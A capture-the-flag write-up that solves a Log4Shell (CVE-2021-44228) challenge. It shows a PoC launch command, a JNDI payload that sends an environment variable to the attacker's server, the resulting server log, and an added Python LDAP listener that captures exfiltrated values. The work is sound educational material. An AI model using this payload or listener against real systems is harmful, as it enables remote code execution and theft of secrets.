
1753CTF

Text Polyfill

The challenge was a Java Spring Boot application that shipped a version of log4j vulnerable to Log4Shell (CVE-2021-44228).

The pom.xml of the Maven project declares:

       <dependency>
           <groupId>org.apache.logging.log4j</groupId>
           <artifactId>log4j-core</artifactId>
           <version>2.14.1</version>
       </dependency>

That is the version everyone was scrambling to patch: every log4j-core release from 2.0-beta9 up to and including 2.14.1 resolves ${jndi:...} lookups inside logged messages, and 2.15.0 was the first release to disable that by default. There is a ready-made PoC for it at https://github.com/kozmer/log4j-shell-poc, which starts a malicious LDAP server and an HTTP server hosting the Exploit.class the LDAP reply points the victim at.

I ran this command on my VPS, with its real IP replaced by 123.123.123.123:

~/ctf/log4j/log4j-shell-poc$ python3 poc.py --userip 123.123.123.123 --webport 8005 --lport 9001

The flag was an environment variable. I submitted ${jndi:ldap://123.123.123.123:1389/${env:flag}} as the text, together with an image that I corrupted by typing random letters into the middle of the image bytes in Burp Suite until I got the right kind of error in the Java code for it to log the submitted text and execute the JNDI LDAP request. Yes, I fuzzed the PNG by hand, but it worked!

And the flag showed up in the terminal of the VPS:

[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc

[+] Exploit java class created success
[+] Setting up LDAP server

[+] Send me: ${jndi:ldap://123.123.123.123:1389/a}
[+] Starting Webserver on port 8005 http://0.0.0.0:8005

Listening on 0.0.0.0:1389
Send LDAP reference result for a redirecting to http://123.123.123.123:8005/Exploit.class
68.183.72.188 - - [16/Mar/2024 08:39:30] "GET /Exploit.class HTTP/1.1" 200 -
Send LDAP reference result for 1753c{generate_text_to_get_an_epic_rce} redirecting to http://123.123.123.123:8005/Exploit.class
68.183.72.188 - - [16/Mar/2024 08:40:12] "GET /Exploit.class HTTP/1.1" 200 -
Send LDAP reference result for 1753c{generate_text_to_get_an_epic_rce} redirecting to http://123.123.123.123:8005/Exploit.class
68.183.72.188 - - [16/Mar/2024 08:40:12] "GET /Exploit.class HTTP/1.1" 200 -
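Why the flag appears in those "Send LDAP reference result for ..." lines, as an added example that is not part of the original write-up or of the kozmer PoC: log4j resolves the inner ${env:flag} lookup before it hands the URL to JNDI, so the JDK's LDAP client connects, binds anonymously, and then sends a SearchRequest whose baseObject is the URL path, i.e. the flag itself. The secret is exfiltrated by the request alone; the PoC's Exploit.class, and with it the remote class loading that newer JDKs block via com.sun.jndi.ldap.object.trustURLCodebase, is never needed for this step. The script below is a minimal catcher that shows exactly that: it decodes the BER-encoded LDAPMessage, answers the bind so the client proceeds to the search, and returns the baseObject. The two sample packets are constructed by hand for the flag value seen in the log, not captured traffic, and the listening port is an assumption matching the PoC's default.

```python
"""Minimal LDAP catcher for Log4Shell lookup exfiltration (added example, not the
challenge's or the log4j-shell-poc project's code). Assumes the JDK JNDI client
behaviour: anonymous BindRequest first, then a SearchRequest whose baseObject is
the URL path, i.e. the already-substituted ${env:flag} value."""
import socket
import sys


def read_tlv(buf, pos):
    """Decode one BER element at buf[pos]; return (tag, value, position after it)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                       # long form: low 7 bits = count of length octets
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    value = buf[pos:pos + length]
    if len(value) != length:
        raise ValueError("truncated BER element")
    return tag, value, pos + length


def read_sequence(value):
    """Split the content of a constructed element into its (tag, value) children."""
    children, pos = [], 0
    while pos < len(value):
        tag, child, pos = read_tlv(value, pos)
        children.append((tag, child))
    return children


def parse_ldap_message(data):
    """Decode an LDAPMessage far enough to see who binds and which DN they search."""
    tag, body, _ = read_tlv(data, 0)
    if tag != 0x30:
        raise ValueError("not an LDAPMessage SEQUENCE")
    (_, msg_id), (op_tag, op_val) = read_sequence(body)[:2]
    msg = {"message_id": int.from_bytes(msg_id, "big")}
    if op_tag == 0x60:                      # [APPLICATION 0] BindRequest
        version, name = read_sequence(op_val)[:2]
        msg.update(op="bindRequest", version=version[1][0], name=name[1].decode())
    elif op_tag == 0x63:                    # [APPLICATION 3] SearchRequest
        fields = read_sequence(op_val)      # baseObject, scope, derefAliases, ...
        msg.update(op="searchRequest",
                   base_object=fields[0][1].decode("utf-8", "replace"),
                   scope=fields[1][1][0])
    else:
        msg["op"] = "unhandled(0x%02x)" % op_tag
    return msg


def bind_response(message_id):
    """BindResponse with resultCode success, so the client goes on to its search.
    Assumes message_id < 128 (one-octet INTEGER), true for a fresh connection."""
    body = b"\x0a\x01\x00" + b"\x04\x00" + b"\x04\x00"   # resultCode, matchedDN, diagnosticMessage
    op = b"\x61" + bytes([len(body)]) + body               # [APPLICATION 1] BindResponse
    mid = b"\x02\x01" + bytes([message_id])
    return b"\x30" + bytes([len(mid) + len(op)]) + mid + op


def catch_once(port=1389):
    """Accept one JNDI client, answer its bind, return the baseObject it searched for."""
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("0.0.0.0", port))
        srv.listen(1)
        conn, _peer = srv.accept()
        with conn:
            for _ in range(2):              # bind, then search; no class is ever served
                msg = parse_ldap_message(conn.recv(4096))
                if msg["op"] == "bindRequest":
                    conn.sendall(bind_response(msg["message_id"]))
                elif msg["op"] == "searchRequest":
                    return msg["base_object"]
    return None


# Constructed sample packets (not a capture) for the flag value seen in the write-up.
SAMPLE_BIND = b"\x30\x0c\x02\x01\x01\x60\x07\x02\x01\x03\x04\x00\x80\x00"  # anonymous bind, id 1
SAMPLE_SEARCH = (
    b"\x30\x4c"                             # LDAPMessage SEQUENCE, 76 bytes
    b"\x02\x01\x02"                         # messageID 2
    b"\x63\x47"                             # [APPLICATION 3] SearchRequest, 71 bytes
    b"\x04\x27" b"1753c{generate_text_to_get_an_epic_rce}"  # baseObject = URL path
    b"\x0a\x01\x00"                         # scope: baseObject
    b"\x0a\x01\x03"                         # derefAliases: derefAlways
    b"\x02\x01\x00" b"\x02\x01\x00"         # sizeLimit 0, timeLimit 0
    b"\x01\x01\x00"                         # typesOnly FALSE
    b"\x87\x0b" b"objectClass"              # filter: present(objectClass)
    b"\x30\x00"                             # attributes: none listed
)

if __name__ == "__main__":
    if "--listen" in sys.argv:
        print("exfiltrated:", catch_once())
    else:
        for packet in (SAMPLE_BIND, SAMPLE_SEARCH):
            print(parse_ldap_message(packet))
```

Run it with --listen to bind 0.0.0.0:1389 and wait for a single connection; without arguments it only decodes the two constructed packets. Unlike the PoC it never redirects the client to a class file, which is also how a defender's honeytoken LDAP listener behaves: the interesting data is already in the request.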
